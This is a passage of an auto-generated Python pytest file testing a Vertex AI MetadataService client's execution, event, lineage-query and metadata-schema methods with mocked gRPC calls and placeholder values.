# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = gca_execution.Execution(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_execution_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_execution(
metadata_service.UpdateExecutionRequest(),
execution=gca_execution.Execution(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.DeleteExecutionRequest,
dict,
],
)
def test_delete_execution(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_execution_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
client.delete_execution()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteExecutionRequest()
@pytest.mark.asyncio
async def test_delete_execution_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.DeleteExecutionRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_execution_async_from_dict():
await test_delete_execution_async(request_type=dict)
def test_delete_execution_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteExecutionRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_execution_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteExecutionRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_delete_execution_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_execution(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_execution_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_execution(
metadata_service.DeleteExecutionRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_delete_execution_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_execution(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_execution_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_execution(
metadata_service.DeleteExecutionRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.PurgeExecutionsRequest,
dict,
],
)
def test_purge_executions(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.purge_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_purge_executions_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
client.purge_executions()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeExecutionsRequest()
@pytest.mark.asyncio
async def test_purge_executions_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.PurgeExecutionsRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.purge_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_purge_executions_async_from_dict():
await test_purge_executions_async(request_type=dict)
def test_purge_executions_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeExecutionsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.purge_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_executions_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeExecutionsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.purge_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_purge_executions_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_executions(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_purge_executions_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_executions(
metadata_service.PurgeExecutionsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_purge_executions_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_executions(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_purge_executions_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_executions(
metadata_service.PurgeExecutionsRequest(),
parent="parent_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.AddExecutionEventsRequest,
dict,
],
)
def test_add_execution_events(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddExecutionEventsResponse()
response = client.add_execution_events(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddExecutionEventsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_service.AddExecutionEventsResponse)
def test_add_execution_events_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
client.add_execution_events()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddExecutionEventsRequest()
@pytest.mark.asyncio
async def test_add_execution_events_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.AddExecutionEventsRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddExecutionEventsResponse()
)
response = await client.add_execution_events(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddExecutionEventsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_service.AddExecutionEventsResponse)
@pytest.mark.asyncio
async def test_add_execution_events_async_from_dict():
await test_add_execution_events_async(request_type=dict)
def test_add_execution_events_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddExecutionEventsRequest()
request.execution = "execution_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
call.return_value = metadata_service.AddExecutionEventsResponse()
client.add_execution_events(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution=execution_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_add_execution_events_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddExecutionEventsRequest()
request.execution = "execution_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddExecutionEventsResponse()
)
await client.add_execution_events(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution=execution_value",
) in kw["metadata"]
def test_add_execution_events_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddExecutionEventsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.add_execution_events(
execution="execution_value",
events=[event.Event(artifact="artifact_value")],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = "execution_value"
assert arg == mock_val
arg = args[0].events
mock_val = [event.Event(artifact="artifact_value")]
assert arg == mock_val
def test_add_execution_events_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.add_execution_events(
metadata_service.AddExecutionEventsRequest(),
execution="execution_value",
events=[event.Event(artifact="artifact_value")],
)
@pytest.mark.asyncio
async def test_add_execution_events_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddExecutionEventsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddExecutionEventsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.add_execution_events(
execution="execution_value",
events=[event.Event(artifact="artifact_value")],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = "execution_value"
assert arg == mock_val
arg = args[0].events
mock_val = [event.Event(artifact="artifact_value")]
assert arg == mock_val
@pytest.mark.asyncio
async def test_add_execution_events_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.add_execution_events(
metadata_service.AddExecutionEventsRequest(),
execution="execution_value",
events=[event.Event(artifact="artifact_value")],
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.QueryExecutionInputsAndOutputsRequest,
dict,
],
)
def test_query_execution_inputs_and_outputs(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
response = client.query_execution_inputs_and_outputs(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryExecutionInputsAndOutputsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
def test_query_execution_inputs_and_outputs_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
client.query_execution_inputs_and_outputs()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryExecutionInputsAndOutputsRequest()
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.QueryExecutionInputsAndOutputsRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
response = await client.query_execution_inputs_and_outputs(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryExecutionInputsAndOutputsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_async_from_dict():
await test_query_execution_inputs_and_outputs_async(request_type=dict)
def test_query_execution_inputs_and_outputs_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryExecutionInputsAndOutputsRequest()
request.execution = "execution_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
call.return_value = lineage_subgraph.LineageSubgraph()
client.query_execution_inputs_and_outputs(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution=execution_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryExecutionInputsAndOutputsRequest()
request.execution = "execution_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
await client.query_execution_inputs_and_outputs(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution=execution_value",
) in kw["metadata"]
def test_query_execution_inputs_and_outputs_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.query_execution_inputs_and_outputs(
execution="execution_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = "execution_value"
assert arg == mock_val
def test_query_execution_inputs_and_outputs_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.query_execution_inputs_and_outputs(
metadata_service.QueryExecutionInputsAndOutputsRequest(),
execution="execution_value",
)
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.query_execution_inputs_and_outputs(
execution="execution_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = "execution_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.query_execution_inputs_and_outputs(
metadata_service.QueryExecutionInputsAndOutputsRequest(),
execution="execution_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateMetadataSchemaRequest,
dict,
],
)
def test_create_metadata_schema(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gca_metadata_schema.MetadataSchema(
name="name_value",
schema_version="schema_version_value",
schema="schema_value",
schema_type=gca_metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE,
description="description_value",
)
response = client.create_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataSchemaRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_metadata_schema.MetadataSchema)
assert response.name == "name_value"
assert response.schema_version == "schema_version_value"
assert response.schema == "schema_value"
assert (
response.schema_type
== gca_metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE
)
assert response.description == "description_value"
def test_create_metadata_schema_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
client.create_metadata_schema()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataSchemaRequest()
@pytest.mark.asyncio
async def test_create_metadata_schema_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.CreateMetadataSchemaRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_metadata_schema.MetadataSchema(
name="name_value",
schema_version="schema_version_value",
schema="schema_value",
schema_type=gca_metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE,
description="description_value",
)
)
response = await client.create_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataSchemaRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_metadata_schema.MetadataSchema)
assert response.name == "name_value"
assert response.schema_version == "schema_version_value"
assert response.schema == "schema_value"
assert (
response.schema_type
== gca_metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE
)
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_create_metadata_schema_async_from_dict():
await test_create_metadata_schema_async(request_type=dict)
def test_create_metadata_schema_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateMetadataSchemaRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
call.return_value = gca_metadata_schema.MetadataSchema()
client.create_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_metadata_schema_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateMetadataSchemaRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_metadata_schema.MetadataSchema()
)
await client.create_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_metadata_schema_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gca_metadata_schema.MetadataSchema()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_metadata_schema(
parent="parent_value",
metadata_schema=gca_metadata_schema.MetadataSchema(name="name_value"),
metadata_schema_id="metadata_schema_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].metadata_schema
mock_val = gca_metadata_schema.MetadataSchema(name="name_value")
assert arg == mock_val
arg = args[0].metadata_schema_id
mock_val = "metadata_schema_id_value"
assert arg == mock_val
def test_create_metadata_schema_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_metadata_schema(
metadata_service.CreateMetadataSchemaRequest(),
parent="parent_value",
metadata_schema=gca_metadata_schema.MetadataSchema(name="name_value"),
